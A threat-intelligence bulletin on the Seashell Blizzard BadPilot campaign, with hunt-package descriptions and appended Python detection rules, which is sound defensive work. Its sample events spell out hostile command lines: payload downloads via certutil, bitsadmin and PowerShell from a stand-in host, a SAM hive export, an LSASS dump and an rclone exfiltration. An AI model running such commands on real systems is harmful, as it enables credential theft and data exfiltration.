
Researchers at Microsoft published an analysis of a subgroup within the infamous Russian state-sponsored actor Seashell Blizzard that has been conducting a campaign code-named BadPilot since 2021. During this campaign, the subgroup compromised internet-facing infrastructure in order to gain access to, and establish persistence on, globally diverse high-value targets, including energy, telecommunications, shipping, arms manufacturing and international government entities. The threat actor initially concentrated its efforts on Ukraine and eventually expanded globally, targeting entities in the United States, United Kingdom, Canada and Australia. It is important that the community take note of Seashell Blizzard expanding beyond its usual Eastern European activity, as the threat group is considered highly sophisticated, with a diverse spectrum of capabilities ranging from cyber espionage to the destruction of targeted systems. The subgroup conducting BadPilot has been observed exploiting known vulnerabilities, such as CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet FortiClient EMS), and abusing remote access tools such as Atera Agent and Splashtop Remote Services to maintain access. Given the global reach of the BadPilot campaign, it is important that organizations prepare themselves and stay on top of activity related to this subgroup going forward.
TITAN References: TITAN Profile Report: Seashell Blizzard
Related Hunt Package Collection: Seashell Blizzard Threat Group
This package identifies activity in PowerShell logging associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.
This package identifies activity associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.
The provided logic looks for single-character batch script (.bat) file names in the command line arguments of a process execution. This is often malicious activity, as single-character script files are uncommon in an environment when executed for legitimate purposes.
This will identify processes executed with common arguments associated with rclone activity used for exfiltration.
Identify suspicious downloads with the built-in Windows tool CertUtil. CertUtil is typically not used to download executables, or files in general, from the web, so its use to download files from the Internet should be considered suspicious.
This Threat Hunt package identifies the use of 'takeown.exe' to modify file ownership, enabling further interaction with those files. This technique can be used by malware and ransomware to access sensitive files in order to steal them, or to unlock them so they can be encrypted.
This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
This Threat Hunt package identifies when a tool such as a LOLBin is used to fetch the Atera Remote Monitoring and Management (RMM) agent directly from Atera's distribution domain.
This Threat Hunt package identifies when the Atera Remote Monitoring and Management (RMM) agent is downloaded directly from Atera's distribution domain.
This use case attempts to find execution of reg.exe with parameters specifying an export of registry keys that contain hashed credentials, which attackers may try to crack offline.
Identify ProcDump usage as a means to dump LSASS data. ProcDump is a Sysinternals tool that can dump process memory; dumping the memory of lsass.exe can be used to obtain credentials.
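Each of the hunt package descriptions above boils down to a pattern over the command line of a process-creation event. As an added illustration (not Intel 471's HUNTER logic), the hypothetical rules below approximate several of them in Python and run over constructed sample events; the rule names, regexes and sample command lines are all assumptions, and the Atera packages are left out because the distribution domain is not named above.

```python
import re

# Hypothetical, simplified command-line rules modelled on the hunt package
# descriptions (not the vendor's logic). Each entry is (rule name, regex).
RULES = [
    # Single-character .bat file name, e.g. "a.bat" or "C:\x.bat".
    ("single_char_bat", re.compile(r'(?:^|[\s\\/])[A-Za-z0-9]\.bat\b', re.I)),
    ("certutil_download", re.compile(r'\bcertutil(?:\.exe)?\b.*-urlcache.*https?://', re.I)),
    ("bitsadmin_transfer", re.compile(r'\bbitsadmin(?:\.exe)?\b.*/transfer\b', re.I)),
    ("powershell_download", re.compile(
        r'\b(?:powershell|pwsh)(?:\.exe)?\b.*\b(?:iwr|irm|sbt|invoke-webrequest|'
        r'invoke-restmethod|start-bitstransfer|curl|wget|webclient|httpclient)\b', re.I)),
    # reg.exe save/export of the hives that hold hashed credentials.
    ("reg_credential_export", re.compile(
        r'\breg(?:\.exe)?\b\s+(?:save|export)\b.*\\(?:sam|security|system)\b', re.I)),
    ("procdump_lsass", re.compile(r'\bprocdump(?:64)?(?:\.exe)?\b.*\blsass\b', re.I)),
    # rclone copy/sync/move to a named remote ("name:" not followed by a path separator).
    ("rclone_exfil", re.compile(r'\brclone(?:\.exe)?\b.*\b(?:copy|sync|move)\b.*\b\w+:(?![\\/])', re.I)),
    ("takeown", re.compile(r'\btakeown(?:\.exe)?\b.*\s/[fr]\b', re.I)),
]

def evaluate(cmdline: str) -> list[str]:
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Constructed sample process-creation events (event id, command line); not real telemetry.
SAMPLE_EVENTS = [
    (1, r'C:\Windows\System32\cmd.exe /c a.bat'),
    (2, r'certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt'),
    (3, r'powershell.exe -nop -w hidden -c "iwr http://example.invalid/a -OutFile b.exe"'),
    (4, r'reg.exe save HKLM\SAM C:\Windows\Temp\sam.save'),
    (5, r'procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp'),
    (6, r'rclone.exe copy C:\Finance remote:exfil --transfers 8'),
    (7, r'takeown.exe /f C:\Users\Public\Documents /r /d y'),
    (8, r'"C:\Program Files\Vendor\setup.bat" --quiet'),          # benign: multi-char name
    (9, r'powershell.exe -File C:\Scripts\inventory.ps1'),          # benign: no download cmdlet
    (10, r'bitsadmin.exe /transfer dl /download /priority normal http://example.invalid/f.exe C:\Users\Public\f.exe'),
]

def hunt(events):
    """Map event id -> fired rule names, keeping only events that fired at least one rule."""
    hits = {}
    for event_id, cmdline in events:
        fired = evaluate(cmdline)
        if fired:
            hits[event_id] = fired
    return hits

if __name__ == "__main__":
    for event_id, fired in hunt(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(fired)}")
```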